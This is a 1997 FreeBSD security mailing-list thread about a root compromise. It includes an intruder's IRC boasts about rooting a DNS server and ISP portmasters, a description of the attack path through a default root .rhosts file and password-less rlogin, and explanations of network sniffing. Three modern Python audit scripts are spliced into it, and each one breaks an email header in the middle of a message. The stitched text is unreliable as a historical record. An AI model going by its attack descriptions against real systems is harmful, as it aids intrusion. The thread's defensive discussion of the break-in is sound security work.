well let's see you changed the root passwd handed it out
[18:18] Jul 28 02:29:45 soma icmplog: ping from venus.GAIANET.NET
[18:18] Jul 28 02:30:19 soma last message repeated 10 times
[18:18] Jul 28 02:31:20 soma last message repeated 18 times
[18:18] Jul 28 02:32:04 soma last message repeated 64 times
[18:18] Jul 28 02:38:52 soma last message repeated 31 times
[18:18] Jul 28 02:39:53 soma last message repeated 54 times
[18:18] Jul 28 02:40:54 soma last message repeated 60 times
[18:18] Jul 28 02:41:37 soma last message repeated 42 times
[18:18] i changed the root passwd to 'root'
someone changed the inetd.conf and rebooted
[18:18] yeah
[18:18] i didn't do that
so now all the machines are pretty much denying all hosts
we don't care to much
[18:19] one of the windows lusers who saw my paste
as far as we're concerned your the cause of the problem
[18:19] umm
[18:19] why don't you fix the inetd.conf
let's put it like this
[18:19] instead of bitching about it
that system is admin'd remotely
that system is admin'd remotely
[18:20] so NO one has physical access to the machine?
your actions caused the main unix boxes on the lan
not at the present time the owners are out of the country
[18:20] so go drive over there or something and boot it up
[18:20] i told you the root pass...
anything I did to you was in an attempt to thwart your efforts to take control
all of my feable efforts failed
your a super leet spoof aren't you
who's caching your dns
[18:22] i'm caching it
[18:22] on an authorative ns box i rooted
Hmm that neet
[18:23] yep
That would explain why netcom security can't find you on the portmaster
________________________________________
| TheCa (theca@wil-de7-10.ix.netcom.com)
| name : No bodies ever knew...
| serv : irc.pacbell.net
[18:24] tell netcom to change the !root pass on some of their portmasters
[18:24] just to be umm safe
[18:25] netcom has no security...it's a joke
that's good
[18:25] netcom shell security is great
[18:25] ppp security == null
[18:26] they've got the biggest REAL isp (not including aol, etc)...you think they can keep track or even try to keep track of everyone?
[18:26] they have well over half a million users
you think they can find you?
you think they can find you?
Session Close: Mon Jul 28 18:32:07 1997
[18:28] Jul 28 19:28:14 soma pppd[16376]: Modem hangup
[18:28] Jul 28 19:28:14 soma pppd[16376]: Connection terminated.
[18:28] Jul 28 19:28:14 soma pppd[16376]: Exit.
[18:29] *clap clap*
[18:29] nice
[18:30] i'll see if that netcom acct is still up
he probably doesn't have the account (!)
The time is now 6:30pm.
[18:30] something like "connect S0" or the port
they just dumped the entire wilmington port
[18:30] ah
[18:30] heh
[18:30] that's stupid
[18:30] now there's no way they'll find me
________________________________________
| TheCa_ (theca@phd-as15s15.erols.com)

That's it, John. Basically he admits it and implies he has control over at least one of your portmasters and possibly one of your dns servers. This is a serious security issue for us and should be for you. If you have ANY contacts at erols.com please forward this to them and cc us if you would.

John Urschel
Gaianet Unix Administrator

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 17:11:30 1997
Date: Mon, 28 Jul 1997 20:09:40 -0400 (EDT)
From: Brian Buchanan
To: Vincent Poy
cc: freebsd-security@freebsd.org
Subject: securelevel (was: Re: security hole in FreeBSD)

On Mon, 28 Jul 1997, Vincent Poy wrote:

>> I was under the impression that doing a 'make world' in multiuser mode
>> wasn't optimal.
>
> I know but when all the admins are remote, it has to be done
> multiuser. Is there a way to push the secure level up to 2 and then push
> it down when a make world is needed?

Uh, that would defeat the purpose of securelevel. It's not supposed to be possible to ever lower it, except when dropping into single-user mode, and even allowing init to do so in that instance is risky IMHO - a few months ago I reported a hole, which I believe was fixed, that made it possible to lower the securelevel by attaching a debugger to init. Even though that's plugged now, it's still possible that there's another way to fool the kernel into thinking that process 1 is requesting that securelevel be lowered.

From owner-freebsd-security Mon Jul 28 17:17:30 1997
Date: Mon, 28 Jul 1997 20:16:08 +0000 (GMT)
From: "Jonathan A. Zdziarski"
To: Vincent Poy
cc: Nate Williams, Robert Watson, Tomasz Dudziak, security@freebsd.org, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD

Actually if you kill the root httpd the others do die (or are supposed to)

-------------------------------------------------------------------------
Jonathan A. Zdziarski                    NetRail Incorporated
Server Engineering Manager               230 Peachtree St. Suite 500
jonz@netrail.net                         Atlanta, GA 30303
http://www.netrail.net                   (888) - NETRAIL
-------------------------------------------------------------------------

On Mon, 28 Jul 1997, Vincent Poy wrote:

> On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote:
>
>> httpd and sessiond initially are run as root, before they spawn off into
>> separate processes. If you replace httpd and sessiond with your own code,
>> so that before it changes its uid and forks, you will get a root shell
>
> That's true too since even if you kill the first httpd, the other
> processes don't die.
>
> Cheers,
> Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 17:18:17 1997
Date: Mon, 28 Jul 1997 20:16:53 +0000 (GMT)
From: "Jonathan A. Zdziarski"
To: Vincent Poy
cc: "[Mario1-]", JbHunt, Robert Watson, Tomasz Dudziak, security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD

I have mine set to root-owned and have had no problems. I also made sure my config files were root, otherwise you could change that to run as-root which is just as bad.

On Mon, 28 Jul 1997, Vincent Poy wrote:

> On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote:
>
>> As long as httpd and sessiond are owned by something other than what cgi
>> scripts run as you're safe, but if they are both nobody, you can replace
>> the binary...We had it happen to us once with v1.2 this is how I know.
>
> Hmmm, what should the owners be for those files? Since the apache
> cgi scripts are owned by root as far as I can remember.
>
> Cheers,
> Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 17:20:40 1997
Date: Mon, 28 Jul 1997 17:20:07 -0700 (PDT)
From: Vincent Poy
To: "Jonathan A. Zdziarski"
cc: Nate Williams, Robert Watson, Tomasz Dudziak, security@freebsd.org, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD

On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote:

> Actually if you kill the root httpd the others do die (or are supposed to)

I tried it before but it doesn't die... Only the master ones die.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 17:21:34 1997
Date: Mon, 28 Jul 1997 17:21:06 -0700 (PDT)
From: Vincent Poy
To: "Jonathan A. Zdziarski"
cc: "[Mario1-]", JbHunt, Robert Watson, Tomasz Dudziak, security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD

On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote:

> I have mine set to root-owned and have had no problems. I also made sure
> my config files were root, otherwise you could change that to run as-root
> which is just as bad.

Hmm, are they supposed to be in the wheel group or bin like some bins are?

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 17:22:21 1997
Date: Mon, 28 Jul 1997 05:15:38 -0800
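The ownership rule Jonathan describes above (httpd and its config must not be owned by, or writable by, whatever the CGI scripts run as) can be checked mechanically; the following is an added example, not code from the thread or from Apache, and the paths and the uid/gid 65534 in the sample are constructed. It also answers Vince's group question in code: wheel or bin as the group is harmless as long as the file is not group-writable by a group the CGI account belongs to.

```python
"""Audit the owner and permission bits of a web server's binaries and
configuration against the uid/gids its CGI scripts run as. If the CGI
account owns or can write to httpd or its config, a CGI compromise
becomes a root compromise the next time the server is started."""
import os
import stat
from typing import Dict, Iterable, List, NamedTuple, Set


class FileFacts(NamedTuple):
    uid: int
    gid: int
    mode: int  # full st_mode, file type bits included


def assess(path: str, facts: FileFacts, cgi_uid: int, cgi_gids: Set[int]) -> List[str]:
    """Return the findings for one file; an empty list means it passes."""
    findings = []
    if facts.uid == cgi_uid:
        findings.append(f"{path}: owned by the CGI uid {cgi_uid}; CGI code can replace it")
    elif facts.uid != 0:
        findings.append(f"{path}: not root-owned (uid {facts.uid})")
    # Group ownership (wheel, bin, ...) only matters if the group can write
    # and the CGI account is a member of that group.
    if facts.mode & stat.S_IWGRP and facts.gid in cgi_gids:
        findings.append(f"{path}: group-writable by a group the CGI account is in (gid {facts.gid})")
    if facts.mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable")
    if facts.mode & stat.S_ISUID and facts.uid != 0:
        findings.append(f"{path}: setuid to a non-root uid")
    return findings


def audit(files: Dict[str, FileFacts], cgi_uid: int, cgi_gids: Set[int]) -> Dict[str, List[str]]:
    """Assess every file and return only the ones with findings."""
    report = {}
    for path, facts in files.items():
        found = assess(path, facts, cgi_uid, cgi_gids)
        if found:
            report[path] = found
    return report


def audit_paths(paths: Iterable[str], cgi_uid: int, cgi_gids: Set[int]) -> Dict[str, List[str]]:
    """Run the audit against real files on this host. The directory holding
    each file is audited too: a writable directory lets the file be swapped
    regardless of the file's own mode."""
    facts = {}
    for p in paths:
        for target in (p, os.path.dirname(p) or "."):
            st = os.stat(target)
            facts[target] = FileFacts(st.st_uid, st.st_gid, st.st_mode)
    return audit(facts, cgi_uid, cgi_gids)


# Constructed sample: a correctly root-owned binary, a config owned by the
# CGI account, and a group-writable config whose group is the CGI group.
# 65534 stands in for "nobody"; the paths are illustrative only.
CGI_UID = 65534
CGI_GIDS = {65534}
SAMPLE = {
    "/usr/local/sbin/httpd": FileFacts(0, 0, stat.S_IFREG | 0o755),
    "/usr/local/etc/httpd/httpd.conf": FileFacts(CGI_UID, CGI_GIDS.copy().pop(), stat.S_IFREG | 0o644),
    "/usr/local/etc/httpd/srm.conf": FileFacts(0, 65534, stat.S_IFREG | 0o664),
}

if __name__ == "__main__":
    for path, findings in audit(SAMPLE, CGI_UID, CGI_GIDS).items():
        for line in findings:
            print(line)
```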
From: "Nicole H."
Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD)
To: "Nicole H.", Brian Buchanan
Cc: security@FreeBSD.ORG

>> What is the range of sniffing? I.E. can the "sniffer" sniff past switched networks?
>> What is the "range" of sniffing?
>
> A machine can sniff any packet that passes through the wire going into its
> ethernet card. Switches, bridges, routers, and smarthubs will all limit
> the range of sniffing by preventing traffic not destined for a part of the
> network from going down its wires. For example, if LAN A is connected to
> LAN B over a switch or a bridge, and both LAN A and LAN B use either
> 10baseT/100baseT going into a common hub for each LAN or thinnet, then
> anyone with root access to a machine on LAN A can sniff all packets
> originating from and destined for LAN A machines, and only those packets.
> The same applies to LAN B - machines on that network can only sniff the
> packets from/to other machines on LAN B. However, if one LAN is using
> 10baseT/100baseT with a smarthub, then machines on that network will only
> receive their own incoming packets, and will thus not be able to sniff
> anyone else's packets. This doesn't mean the packets can't be sniffed,
> though. If the packets cross any insecure network or pass through a
> router en route to their destination, they can be sniffed there.

Thanks! That's kind of what I thought. Does anyone know however if an Ascend Max unit can be sniffed across? I.E. can a dial up user sniff everyone else connected to the ethernet that it is plugged into, assuming it is not using bridging? If this is not possible, how do most people tend to sniff a network to get a password, since you have to be on the network to sniff for a password....

Thanks again

Nicole
nicole@mediacity.com

From owner-freebsd-security Mon Jul 28 17:22:51 1997
To: Vincent Poy
cc: security@FreeBSD.ORG, "[Mario1-]", JbHunt
From: "Gary Palmer"
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Mon, 28 Jul 1997 03:19:55 PDT."
Date: Mon, 28 Jul 1997 20:22:21 -0400
Message-ID: <3749.870135741@orion.webspan.net>

Vincent Poy wrote in message ID :

> Saw the user on irc posting the password of earth with the login
> name root. Any ideas?

Take the machine offline and reinstall the *ENTIRE* thing. You have been root kitted, which allows remote access & hiding of remote access, without any daemons needed to be running.

Gary
--
Gary Palmer                                          FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

From owner-freebsd-security Mon Jul 28 17:27:46 1997
Date: Mon, 28 Jul 1997 17:27:15 -0700 (PDT)
From: Vincent Poy
To: "Jonathan A. Zdziarski"
cc: "[Mario1-]", JbHunt, Robert Watson, Tomasz Dudziak, security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD

Just an update on how the break-in was done after the hacker was confronted on irc. Apparently FreeBSD ships with .rhosts in the root account. Using this and perl5.00401, the user was able to rlogin onto the other machine without using a password. The .rhosts file was unaltered and was the same way FreeBSD installed it originally. The user broke the security of many of Netcom's Livingston Portmasters and was caching the DNS for netcom. Netcom Security was unable to track down the user until dumping the entire portmaster off.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 17:31:00 1997
Date: Mon, 28 Jul 1997 17:30:44 -0700 (PDT)
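Since the break-in Vince describes turned on a .rhosts entry granting password-less rlogin to root, an auditor for rhosts-style trust files is the check an administrator would want; this is an added example, not code from the thread or from FreeBSD. It parses the `hostname [username]` format shared by ~/.rhosts and /etc/hosts.equiv, flags wildcard, netgroup and any-root-login entries, and mirrors the owner and mode conditions under which BSD's ruserok(3) refuses the file; the sample file and its hostnames are constructed.

```python
"""Audit rhosts-style trust files. A matching entry lets rlogind/rshd admit
the remote user with no password, so every entry, and the file's own
ownership and mode, is security-relevant."""
import os
import stat
from typing import List, NamedTuple, Optional


class Entry(NamedTuple):
    host: str
    user: Optional[str]
    negated: bool


def parse_rhosts(text: str) -> List[Entry]:
    """Parse 'hostname [username]' lines. '+' is a wildcard, '+@grp' and
    '-@grp' name netgroups, a leading '-' on either field denies, and '#'
    starts a comment."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        negated = host.startswith("-") or (user is not None and user.startswith("-"))
        entries.append(Entry(host, user, negated))
    return entries


def assess_entries(entries: List[Entry], account: str) -> List[str]:
    """Findings for the entries of the .rhosts belonging to `account`."""
    findings = []
    for e in entries:
        if e.negated:
            continue  # a deny entry grants nothing
        where = f"{e.host} {e.user or ''}".strip()
        if e.host == "+":
            findings.append(f"'{where}': any host is trusted")
        if e.user == "+":
            findings.append(f"'{where}': any remote user may log in as {account}")
        if e.host.startswith("+@") or (e.user or "").startswith("+@"):
            findings.append(f"'{where}': trust delegated to a netgroup; NIS/YP must be trustworthy")
        if account == "root":
            findings.append(f"'{where}': grants password-less root login from {e.host}")
    return findings


def assess_file_mode(st_uid: int, owner_uid: int, st_mode: int) -> List[str]:
    """BSD ruserok(3) ignores a .rhosts that is not owned by the account or
    root, or that is group/other-writable; a non-regular file is flagged here
    as well. These are also exactly the properties an intruder would alter."""
    findings = []
    if not stat.S_ISREG(st_mode):
        findings.append("not a regular file")
    if st_uid not in (0, owner_uid):
        findings.append(f"owned by uid {st_uid}, not the account or root")
    if st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("writable by group or other")
    return findings


def audit_rhosts(path: str, account: str, owner_uid: int) -> List[str]:
    """Audit a real .rhosts file on this host (mode checks, then entries)."""
    st = os.lstat(path)
    findings = assess_file_mode(st.st_uid, owner_uid, st.st_mode)
    with open(path) as fh:
        findings += assess_entries(parse_rhosts(fh.read()), account)
    return findings


# Constructed sample resembling a permissive root .rhosts.
SAMPLE_RHOSTS = """\
# hosts trusted for rlogin/rsh
earth.example.net
venus.example.net  +
+ operator
-mercury.example.net
"""

if __name__ == "__main__":
    for line in assess_entries(parse_rhosts(SAMPLE_RHOSTS), "root"):
        print(line)
```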
From: Vincent Poy
To: Gary Palmer
cc: security@FreeBSD.ORG, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD
In-Reply-To: <3749.870135741@orion.webspan.net>

On Mon, 28 Jul 1997, Gary Palmer wrote:

> Vincent Poy wrote in message ID :
>> Saw the user on irc posting the password of earth with the login
>> name root. Any ideas?
>
> Take the machine offline and reinstall the *ENTIRE* thing. You have
> been root kitted, which allows remote access & hiding of remote
> access, without any daemons needed to be running.

Machines are offline already. The hacker confronted us and said that it was the default .rhosts file that came in the FreeBSD root account and he used perl5.00401 which had a security hole and then used rlogin to login to another machine without the password.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 17:31:10 1997
To: "Jonathan A. Zdziarski"
cc: security@FreeBSD.ORG
From: "Gary Palmer"
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Mon, 28 Jul 1997 15:54:26 -0000."
Date: Mon, 28 Jul 1997 20:30:55 -0400
Message-ID: <6589.870136255@orion.webspan.net>

"Jonathan A. Zdziarski" wrote in message ID :

> I'm a little paranoid, as somebody hacked our system about a month ago and
> said he would do it again. Where is the source code for /bin/login? I've
> checked /usr/src, the only thing I find is
> /usr/src/contrib/cvs/src/login.c and contrib/opie/libopie/login.c, but
> that doesn't seem right.

/usr/src/usr.bin/login

Gary

From owner-freebsd-security Mon Jul 28 17:33:15 1997
Date: Mon, 28 Jul 1997 20:33:11 -0400 (EDT)
From: Brian Buchanan
To: "Nicole H."
cc: security@FreeBSD.ORG
Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD)

> Thats kind of what I thought. Does anyone know however if an Ascend Max unit can be sniffed across. I.E. Can
> a dial up user sniff everyone else connected to the ethernet that it is plugged into, assuming it is not
> using bridging.

Almost certainly not. I'm assuming the unit is a terminal server, and in that case it acts as a gateway between the dialup connection and the local network. Sending all network traffic over the dialup line would very quickly saturate it.

> If this is not possible. How do most people tend to sniff a network to get a password since you have to be on
> the network to sniff for a password....

Once you've compromised root on one system on a network, you can sniff anything that passes past or through that machine. From there, it's possible to sniff out passwords to other machines on that network, or passwords to remote machines that were transmitted over the local network.

Any kind of "public" network is especially vulnerable to this kind of attack. Someone could use the bug of the week to get root privileges on a UNIX or NT workstation and sniff the network it's connected to for people sending passwords to remote machines. If someone sends a root password, the attack can spread to that machine and then to its entire network.
From owner-freebsd-security Mon Jul 28 17:34:33 1997
To: "Nicole H."
cc: Robert Watson, Vincent Poy, "[Mario1-]", JbHunt, security@FreeBSD.ORG, Tomasz Dudziak
From: "Gary Palmer"
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Mon, 28 Jul 1997 02:22:24 -0800."
Date: Mon, 28 Jul 1997 20:34:09 -0400
Message-ID: <6954.870136449@orion.webspan.net>

"Nicole H." wrote in message ID :

> Does anyone know of a good way to detect people "sniffing" on the
> network? IE a program that will detect a machine running in
> promiscuous mode?

There is no way to detect that from outside the machine ... after all, it's just listening to all the packets that go past. FreeBSD 2.2 and later log a message to console when an interface goes into promiscuous mode.

The *REAL* answer is to remove BPF from all machines, and make sure they stay removed.

Gary

From owner-freebsd-security Mon Jul 28 17:36:11 1997
Date: Mon, 28 Jul 1997 17:34:27 -0700 (PDT)
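Gary's point above is that the only local evidence of sniffing is the kernel's promiscuous-mode log message, and the icmplog lines in John's IRC log show the other kind of evidence syslog gives you; the following added example (not code from the thread or from FreeBSD) scans syslog output for both, expanding syslogd's "last message repeated N times" lines so the ping counts are not undercounted. The icmplog lines are the ones quoted in the thread; the kernel lines for a host called earth are constructed, and the exact wording of the kernel's message is assumed. Since root on the sniffing host can scrub its own log, this only means something if the lines are forwarded to a separate loghost.

```python
"""Scan BSD syslog lines for interfaces entering promiscuous mode and for
icmplog ping floods, expanding "last message repeated N times" entries."""
import re
from collections import Counter
from typing import Iterable, Iterator, List, Tuple

SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) (?P<rest>.*)$")
REPEAT_RE = re.compile(r"^last message repeated (?P<n>\d+) times$")
# Assumed shape of the kernel's message, e.g. "ed0: promiscuous mode enabled".
PROMISC_RE = re.compile(r"^(?P<ifname>[a-z]+\d+): promiscuous mode (?P<state>enabled|disabled)$")
ICMPLOG_RE = re.compile(r"^ping from (?P<src>\S+)$")

Record = Tuple[str, str, str, str, int]  # (timestamp, host, tag, message, count)


def parse_syslog(lines: Iterable[str]) -> Iterator[Record]:
    """Yield one record per logical message. A "last message repeated N times"
    line becomes a record for the preceding message carrying count N."""
    last = None
    for line in lines:
        m = SYSLOG_RE.match(line.rstrip("\n"))
        if not m:
            continue
        ts, host, rest = m.group("ts", "host", "rest")
        rep = REPEAT_RE.match(rest)
        if rep:
            if last is not None:
                yield (ts, host, last[0], last[1], int(rep.group("n")))
            continue
        tag, sep, msg = rest.partition(": ")
        if not sep:
            tag, msg = "", rest
        last = (tag, msg)
        yield (ts, host, tag, msg, 1)


def promiscuous_events(lines: Iterable[str]) -> List[Tuple[str, str, str, str]]:
    """(timestamp, host, interface, state) for every promiscuous-mode transition."""
    events = []
    for ts, host, _tag, msg, _count in parse_syslog(lines):
        pm = PROMISC_RE.match(msg)
        if pm:
            events.append((ts, host, pm.group("ifname"), pm.group("state")))
    return events


def icmp_ping_counts(lines: Iterable[str]) -> Counter:
    """Total pings per (host, source) as logged by icmplog, repeats included."""
    totals: Counter = Counter()
    for _ts, host, tag, msg, count in parse_syslog(lines):
        im = ICMPLOG_RE.match(msg) if tag == "icmplog" else None
        if im:
            totals[(host, im.group("src"))] += count
    return totals


def icmp_flood_sources(lines: Iterable[str], threshold: int = 100) -> List[str]:
    """Sources that pinged some host at least `threshold` times in the log."""
    return sorted({src for (_host, src), n in icmp_ping_counts(lines).items() if n >= threshold})


# Sample input: the icmplog lines quoted in the thread plus two constructed
# kernel lines for a host called earth.
SAMPLE_LINES = [
    "Jul 28 02:29:45 soma icmplog: ping from venus.GAIANET.NET",
    "Jul 28 02:30:19 soma last message repeated 10 times",
    "Jul 28 02:31:20 soma last message repeated 18 times",
    "Jul 28 02:32:04 soma last message repeated 64 times",
    "Jul 28 02:38:52 soma last message repeated 31 times",
    "Jul 28 02:39:53 soma last message repeated 54 times",
    "Jul 28 02:40:54 soma last message repeated 60 times",
    "Jul 28 02:41:37 soma last message repeated 42 times",
    "Jul 28 03:02:11 earth /kernel: ed0: promiscuous mode enabled",
    "Jul 28 03:02:15 earth /kernel: ed0: promiscuous mode disabled",
]

if __name__ == "__main__":
    for ts, host, ifname, state in promiscuous_events(SAMPLE_LINES):
        print(f"{ts} {host}: {ifname} promiscuous mode {state}")
    for (host, src), n in icmp_ping_counts(SAMPLE_LINES).items():
        print(f"{host}: {n} pings from {src}")
```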
From: Vincent Poy
To: Brian Buchanan
cc: freebsd-security@freebsd.org, JbHunt, "[Mario1-]"
Subject: Re: securelevel (was: Re: security hole in FreeBSD)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Brian Buchanan wrote:

=)Uh, that would defeat the purpose of securelevel. It's not supposed to be
=)possible to ever lower it, except when dropping into single-user mode, and
=)even allowing init to do so in that instance is risky IMHO - a few months
=)ago I reported a hole, which I believe was fixed, that made it possible to
=)lower the securelevel by attaching a debugger to init. Even though that's
=)plugged now, it's still possible that there's another way to fool the
=)kernel into thinking that process 1 is requesting that securelevel be
=)lowered.

	Anything is possible since nothing is unhackable. Would running
init at securelevel 2 and then have it reboot multi-user at a lower level
be possible?

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET
Unix Networking Operations - FreeBSD-Real Unix for Free
GaiaNet Corporation - M & C Estate
Beverly Hills, California USA 90210
HongKong Stars/Gravis UltraSound Mailing Lists Admin

From owner-freebsd-security Mon Jul 28 17:36:33 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA17454 for security-outgoing; Mon, 28 Jul 1997 17:36:33 -0700 (PDT)
Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA17437 for ; Mon, 28 Jul 1997 17:36:29 -0700 (PDT)
Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id UAA25707; Mon, 28 Jul 1997 20:36:28 -0400 (EDT)
Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id UAA08210; Mon, 28 Jul 1997 20:36:27 -0400 (EDT)
To: Brian Buchanan
cc: "Nicole H.", security@FreeBSD.ORG
From: "Gary Palmer"
Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD)
In-reply-to: Your message of "Mon, 28 Jul 1997 19:06:47 EDT."
Date: Mon, 28 Jul 1997 20:36:27 -0400
Message-ID: <8208.870136587@orion.webspan.net>
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Brian Buchanan wrote in message ID :

> I was wondering the same thing when I read a clause prohibiting the use of
> network cards in promiscuous mode in the CMU network use policy. I asked
> some computer security people I knew about this and their response was
> that it is not possible to detect if a network card is in promiscuous mode
> unless you have access to the machine it's in - i.e., that you can look at
> ifconfig on that machine.

That only works if ifconfig has not been altered to hide the flag.

Gary
--
Gary Palmer                                          FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

From owner-freebsd-security Mon Jul 28 17:40:37 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA17865 for security-outgoing; Mon, 28 Jul 1997 17:40:37 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA17860; Mon, 28 Jul 1997 17:40:32 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id RAA07383; Mon, 28 Jul 1997 17:40:28 -0700 (PDT)
Date: Mon, 28 Jul 1997 17:40:28 -0700 (PDT)
From: Vincent Poy
To: Gary Palmer
cc: "Nicole H.", Robert Watson, "[Mario1-]", JbHunt, security@FreeBSD.ORG, Tomasz Dudziak
Subject: Re: security hole in FreeBSD
In-Reply-To: <6954.870136449@orion.webspan.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Gary Palmer wrote:

=)"Nicole H." wrote in message ID
=):
=)
=)
=)> Does anyone know of a good way to detect people "sniffing" on the
=)> network? IE a program that will detect a machine running in
=)> promiscuous mode?
=)
=)There is no way to detect that from outside the machine ... after all,
=)it's just listening to all the packets that go past.
=)
=)FreeBSD 2.2 and later log a message to console when an interface goes
=)into promiscuous mode.

	It seems the interface always goes into promiscuous mode though.

=)The *REAL* answer is to remove BPF from all machines, and make sure
=)they stay removed.

	Hmmm, if BPF isn't there, how will utils like trafshow work to
track people down?

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET
Unix Networking Operations - FreeBSD-Real Unix for Free
GaiaNet Corporation - M & C Estate
Beverly Hills, California USA 90210
HongKong Stars/Gravis UltraSound Mailing Lists Admin

From owner-freebsd-security Mon Jul 28 17:45:20 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA18243 for security-outgoing; Mon, 28 Jul 1997 17:45:20 -0700 (PDT)
Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA18236 for ; Mon, 28 Jul 1997 17:45:11 -0700 (PDT)
Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id UAA27505; Mon, 28 Jul 1997 20:44:50 -0400 (EDT)
Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id UAA09761; Mon, 28 Jul 1997 20:44:45 -0400 (EDT)
To: Vincent Poy
cc: "Jordan K. Hubbard", security@FreeBSD.ORG, "[Mario1-]", JbHunt
From: "Gary Palmer"
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Mon, 28 Jul 1997 16:15:13 PDT."
Date: Mon, 28 Jul 1997 20:44:45 -0400
Message-ID: <9758.870137085@orion.webspan.net>
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Vincent Poy wrote in message ID :

> On Mon, 28 Jul 1997, Jordan K. Hubbard wrote:
>
> =)I think you are describing the symptom, not the problem.
> =)
> =)This looks very much like a system which was broken into and then
> =)trojan'd to allow easier, more invisible access. How do you know,
> =)for example, that your telnetd is really telnetd? Did you verify that? ;)
>
> 	Well, because I connect to the system using telnet ;) Also, this
> guy has been known to break in to machines
> (theca@wil-de7-10.ix.netcom.com). This is the person who also hacked
> irc.hardlink.com. I think this person goes around hacking machine after
> machine, and nobody does anything about it.

If this hack caused loss of service, notify your local (or state)
police. They'll do something.

> =)Also, I'd check that inetd.conf file again and make _really sure_ you
> =)haven't left remote shell access enabled - a lot of people miss that
> =)because it's not explicitly labelled "rlogin" like they might expect.

> 	I checked and disabled everything except telnetd in
> /etc/inetd.conf and rebooted the machine and then he kicked all of us who
> are admins out and shutdown the system.

Vince, I hate to say this, but you really need to learn more about
administering a system. Do you use SSH for secure access for people who
have root access? If not, you are *ASKING* to be hacked every day of
the week. If you don't use SSH, do you use one-time passwords
(e.g. skey?) How do you know your telnetd binary is what it claims to
be? Your machine has been compromised to the *ROOT* level. *EVERY*
single binary and file on that machine *COULD HAVE BEEN REPLACED*.

Take that machine off the net *NOW* and work on it from console. If
that is not an option, then you really need to start learning (fast)
about just what a hacker can do to your system. If he really has that
level of access, you are *SCREWED* right now without console
access. Even if you put sshd on there now, he could have it replaced
with his own version before you could make use of it and kick him off.

And I must say, if you haven't taken reasonable steps to secure your
admin sessions, and following the security and cvs mailing lists for
bugs, then you really have been asking for this. I know (from
experience) just what it takes to run a shell server, and just what
hackers these days can do with 5 minutes of their spare time.

Gary
--
Gary Palmer                                          FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

From owner-freebsd-security Mon Jul 28 17:45:54 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA18297 for security-outgoing; Mon, 28 Jul 1997 17:45:54 -0700 (PDT)
